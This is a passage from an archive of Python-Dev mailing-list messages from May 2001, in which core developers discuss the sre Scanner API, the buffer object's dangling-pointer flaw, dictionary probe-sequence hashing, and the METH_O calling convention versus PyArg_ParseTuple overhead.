References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to more calling
> conventions.

This morning another idea popped up which could help us with
handling generic callings schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with an
changing number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 - n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paulp at ActiveState.com  Sat May 26 17:02:08 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

What ever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal at lemburg.com  Sat May 26 17:47:47 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer object didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 23:15:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> What ever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumeted API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The lack above is the source of your later TypeError.  Unclear to
   me whether that was the intent, or ust the way the code happens to
   work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH at ActiveState.com  Sun May 27 04:39:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one elses.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one at home.com  Sun May 27 08:34:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)

Christian had a very clever (cheap and effective) solution:

    Old algortithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Sun May 27 11:01:14 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spend in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would be still cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal at lemburg.com  Sun May 27 12:26:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spend in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as fallback solution for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (like e.g. "O" and "OO") and then provide the
same special case handling like you do with e.g. METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 27 12:30:48 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy at digicool.com  Sun May 27 20:51:26 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spend in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy at digicool.com  Sun May 27 20:55:36 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of a zero or one arguments.  There's special-case code in
ceval to support it these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one at home.com  Sun May 27 22:37:43 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of a zero or one arguments.  There's special-case code in
> ceval to support it these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case despite
that it wasn't declared that way and that it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one at home.com  Sun May 27 22:46:29 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh at python.net  Sun May 27 23:32:48 2001
From: mwh at python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
(ie. more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.

Cheers,
M.


From tim.one at home.com  Mon May 28 00:49:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developements.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.

> My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
> (ie. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas at xs4all.net  Mon May 28 00:50:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific errormessage by passing ':len' in the
format string. Of course, this can easily be (and probably should) done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Mon May 28 00:58:30 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine sourcecode is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 00:45:53 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
	Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).

Regards,
Martin


From tim.one at home.com  Mon May 28 01:17:27 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific errormessage by passing ':len' in
> the format string. Of course, this can easily be (and probably should)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets a (one or more) keyword argument.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Yraceback (most recent call last):
 File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.


From greg at cosc.canterbury.ac.nz  Mon May 28 02:23:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Mon May 28 02:28:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein at lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Mon May 28 03:42:30 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
